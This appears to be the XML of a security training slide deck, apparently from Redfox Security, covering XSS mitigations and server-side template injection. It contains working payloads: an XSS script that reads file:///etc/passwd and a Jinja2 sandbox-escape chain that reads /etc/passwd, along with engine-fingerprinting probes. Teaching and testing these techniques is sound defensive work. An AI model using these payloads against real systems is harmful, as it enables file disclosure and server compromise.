                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>x.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:latin typeface="Nunito Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>When the Filter or WAF is implemented.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>addNewlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(str){var result='';while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>str.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>&gt;0){result+=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>str.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(0,100)+'\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>n';str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>str.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(100);}return result;}x=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>x.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>=function(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>addNewlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>this.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>)))};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>x.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>GET","file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>:///etc/passwd");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>x.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>();&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:latin typeface="Nunito Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8188CD-69CE-4FF6-9749-E429604F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5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743D-B142-4174-ADB4-F24AAF7E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Vulnerable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8AC6C-39B9-4AE0-8772-4C0E648C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73" y="2036503"/>
            <a:ext cx="4950006" cy="4701182"/>
          </a:xfrm>
          <a:prstGeom prst="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5" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F37C70-1957-4904-98BE-A15DF371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24D0-80AD-4FFC-ABE1-25382C41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 dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Mitigations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D4D255-122E-4DEA-9F85-F3DB3C7F5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6482" y="2020834"/>
            <a:ext cx="1083517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Output Encoding (The Gold Standard)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You must convert special characters into their safe "HTML Entity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equivalents before rendering them in the browser.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This stops the browser from interpreting the input as code (tags) and forces it to display it as plain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What to convert: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&lt; becomes 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&gt; becomes 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gt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&amp; becomes &amp;amp;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becomes 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quot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' becomes &amp;#x27;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Input Sanitization (When you allow HTML)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If your application needs to allow users to post HTML (e.g., a rich text editor or a blog post with bold text), simple escaping won't work because it breaks the formatting. You need to sanitize the HTML.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This involves using a trusted library to parse the HTML and strip out dangerous tags (like &lt;script&gt;, &lt;object&gt;, &lt;iframe&gt;) and dangerous attributes (like onload, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>, onclick) while keeping safe tags (like &lt;b&gt;, &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;, &lt;p&gt;).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/>
              <a:t>Recommended Libraries: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Node.js: sanitize-html or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>dompurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> (running via JSDOM).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Python: Bleach.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Java: OWASP Java HTML Sanitizer.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PHP: HTML Purifier.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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9ECC4CF-7A8B-49EE-87D5-8B7AF084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58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Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C91B46-4F00-FFC6-86F9-45C20F2D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96" y="2661919"/>
            <a:ext cx="1490598" cy="14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AF15A8-9B3D-1864-3FC4-D317ABF11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938253"/>
            <a:ext cx="8144134" cy="1373070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Server Side Template Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:latin typeface="Nunito Sans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30A767-A07E-8DD2-207D-EA6DDACDC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74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Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C91B46-4F00-FFC6-86F9-45C20F2D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96" y="2661919"/>
            <a:ext cx="1490598" cy="14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AF15A8-9B3D-1864-3FC4-D317ABF1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dirty="0" err="1">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:latin typeface="Nunito Sans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30A767-A07E-8DD2-207D-EA6DDACDC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697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7140-2F08-4516-807F-440A29F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Templates ? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D38D310E-13C1-427F-8697-C921DADF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02" y="508268"/>
            <a:ext cx="1490598" cy="14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03C7CC9-E781-4390-A872-D8E61A884F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4859" y="2109665"/>
            <a:ext cx="9739323" cy="511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What are Templates?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In the world of websites,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Template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is that stencil. It is a pre-written file that has "holes" in it for specific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Think of a template like a "Mad Libs" sheet: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"Hello,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[NAME]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! You have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[NUMBER]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unread messages.“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The website doesn't create a brand-new page for every user. It just takes one template and plugs your specific data into those holes.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Nunito Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Why do applications use them in the first place?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Speed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>It’s much faster for a computer to "fill in the blanks" than to build a whole page from scratch every time you click a button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Consistency: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>It ensures that every profile page on a site like Facebook or Instagram looks exactly the same, just with different photos and names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Laziness (The Good Kind!): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>If a designer wants to change the background color of the entire website, they only have to change it in one template file instead of editing millions of individual profile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4911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F7DD-F91B-258B-1FCE-0D0CEECA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 b="1">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Popular Template Engines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C547ADB8-CFD6-9F4D-8FAB-F5CE91A3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77" y="663485"/>
            <a:ext cx="1230443" cy="12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ero Day Twig PHP template engine by Jameel Nabbo on Exploit DB">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{017E7F5A-F390-6840-A08B-6C28B7A5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128235"/>
            <a:ext cx="45910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arty Template Engine using PHP">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF4D4C9D-A282-A792-3B87-89C43501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42" y="2128234"/>
            <a:ext cx="4913707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Velocity - Visual Studio Marketplace">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1CD41AA-EF7C-9237-7033-34B47DB4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50" y="4595210"/>
            <a:ext cx="24003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inja (template engine) - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354DDE41-E263-FA6B-84D0-E05142D0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5" y="4772967"/>
            <a:ext cx="4591049" cy="17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de - npm">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DCB5441-954B-AA4A-135C-C7CB8E0D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43" y="459521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31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3E37-95B9-40C7-8CC5-B0DA074E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Template in Modern Apps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C75C3E-41DB-4CE6-85EB-923A242A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7" b="8643"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514510" y="2013034"/>
            <a:ext cx="5263533" cy="4811379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Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E202F40-A9F0-4F51-8E33-CD41011F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3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F821-D931-4A0C-BED8-DA7673F9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SSTI ?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C4601D-AC55-4A05-8D62-29C1B2046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151373"/>
            <a:ext cx="1002626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SSTI happens when the "stencil" (the template) is too smart for its own good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Normally, if you tell the website your name is "Bob," the template says: Hello, Bob!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But what if you told the website your name was a math problem, like {{ 7 * 7 }}?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A Safe Website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would just say: Hello, {{ 7 * 7 }}! (It treats it like plain text).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A Vulnerable Website (SSTI)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would actually "run" that math and say: Hello, 49!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Why is this bad?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If the website is willing to do math for you, it might be willing to do other things. A clever hacker won't just ask for 7 * 7. They will start typing secret commands into that "name" box, like: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"Show me the secret files on this computer."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"Shut down the server."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"Show me everyone else's passwords."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Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86F1383-2EAD-4EBA-AAD1-87BBA8E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524-4C6E-4C82-8130-3FE6D7FCB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Identification: The “Decision Tree” Methodology.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88867D-3521-4D66-BF17-6FF6344DC1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1" y="1938793"/>
            <a:ext cx="9808759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As a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>P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Nunito Sans"/>
              </a:rPr>
              <a:t>entester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, you identify SSTI by observing how the server handles mathematical expressions or syntax specific to various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Phase A: Detecting the Reflection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>${{&lt;%[%'"}}%\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>)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(Polyglot)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Inject a simple mathematical payload: {{7*7}}, ${7*7}, or &lt;%= 7*7 %&gt;. If the response reflects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49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, you have an injection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Phase B: Identifying the Engine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Once you know the server is evaluating code, you need to "fingerprint" the engine. This is done using a process of elimination based on how different engines handle specific characters.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2D2142-7956-4FD2-967D-F1F9FD02E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42103"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="406401" y="4926454"/>
          <a:ext cx="9613899" cy="18288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204633">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3162426332"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3204633">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1334745191"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3204633">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1982080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chemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Nunito Sans"/>
                        </a:rPr>
                        <a:t>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Nunito Sans"/>
                        </a:rPr>
                        <a:t>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Nunito Sans"/>
                        </a:rPr>
                        <a:t>Likely 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1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Nunito Sans"/>
                        </a:rPr>
                        <a:t>{{7*7}}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Jinja2, Twig, Mako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6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${7*7}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Nunito Sans"/>
                        </a:rPr>
                        <a:t>Smarty, Mako, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Nunito Sans"/>
                        </a:rPr>
                        <a:t>FreeMarker</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Nunito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446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#{7*7}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Nunito Sans"/>
                        </a:rPr>
                        <a:t>Pug, Jade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&lt;%= 7*7 %&gt;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Nunito San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Nunito Sans"/>
                        </a:rPr>
                        <a:t>ERB (Ruby)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87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00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DFF4-3BFB-4115-96A1-A00032F2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for Template Engines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883E5C5-0D7A-41A1-85D9-1A67EAED9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625311"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="680321" y="2111023"/>
          <a:ext cx="9468390" cy="4560705"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1578065">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="306330239"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1578065">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1577403746"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1578065">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1999411466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1578065">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1804173249"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1578065">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2010022930"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1578065">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1419405295"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="853148"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Initial Payload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Observed Output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Secondary / Confirmation Payload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Secondary Output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Identified Engine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Language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840051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{{7*7}}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{{7*'7'}}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7777777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Jinja2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dirty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Python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859567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{{7*'7'}}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Twig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PHP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194531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{{1+1}}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2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Mako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Python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0215"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="604975"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${7*7}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{$smarty.version}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(Version Number)</a:t>
                      </a:r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Smarty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dirty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PHP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04095"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="604975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty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 dirty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${.version}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(Version Number)</a:t>
                      </a:r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FreeMarker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Java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229795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${#vars}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(Variable List)</a:t>
                      </a:r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Thymeleaf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Java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9053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&lt;%= 7*7 %&gt;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(None)</a:t>
                      </a:r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ERB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Ruby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793045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#{7*7}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 dirty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(None)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="1600" b="0" dirty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Pug / Jade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NodeJS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36580"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="356801"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@{7*7}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49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1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(None)</a:t>
                      </a:r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N" sz="1600" b="0">
                        <a:solidFill>
                          <a:srgbClr val="1F1F1F"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Nunito Sans"/>
                      </a:endParaRP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Razor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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="1F1F1F"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Nunito Sans"/>
                        </a:rPr>
                        <a:t>.NET</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="65040" marR="65040" marT="43360" marB="433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37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1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7A86-B645-4DB2-9D28-C6CCED13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Nunito Sans"/>
              </a:rPr>
              <a:t>Escaping the Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 2" descr="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*35XwCGeYeKYmeaU8rdkSdg.jpeg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEC4ECA-990D-4ABF-91B2-3A38770A8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00489" cy="25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A85FBEB-39BC-467E-B814-BCE92EF839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010" y="2521254"/>
            <a:ext cx="970417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In languages like Python (Jinja2) or Java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Nunito Sans"/>
              </a:rPr>
              <a:t>Thymeleaf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), every object is linked to the "Global" state or the "Runtime" environment. An attacker doesn't just want to do math; they want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climb the object tree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until they hit a sensitive function (like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Nunito Sans"/>
              </a:rPr>
              <a:t>os.system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Nunito Sans"/>
              </a:rPr>
              <a:t>java.lang.Runtime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Nunito Sans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Nunito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Nunito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Nunito Sans"/>
              </a:rPr>
              <a:t>The Chain of Command (Python/Jinja2 Example):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800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> Start with an empty string: ‘’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800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> Access its class: ''.__class__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800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> Go to the base object: ''.__class__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__[1]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800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> List all subclasses: .__subclasses__()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800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> Find a class that allows command execution (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>subprocess.Popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>) and call it.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endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Nunito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Nunito Sans"/>
              </a:rPr>
              <a:t>Payload Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> {{ ''.__class__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>__[1].__subclasses__()[407]('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>/passwd').read() }}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223998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0486-EF2E-4976-9184-50C5A41D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Nunito Sans"/>
              </a:rPr>
              <a:t>Exploitation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AF746F-5BE3-4BF3-B207-772BEC2D2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014537"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="541866" y="2483557"/>
          <a:ext cx="9597256" cy="408220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07608">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2891319595"/>
                    </a:ext>
                  </a:extLst>
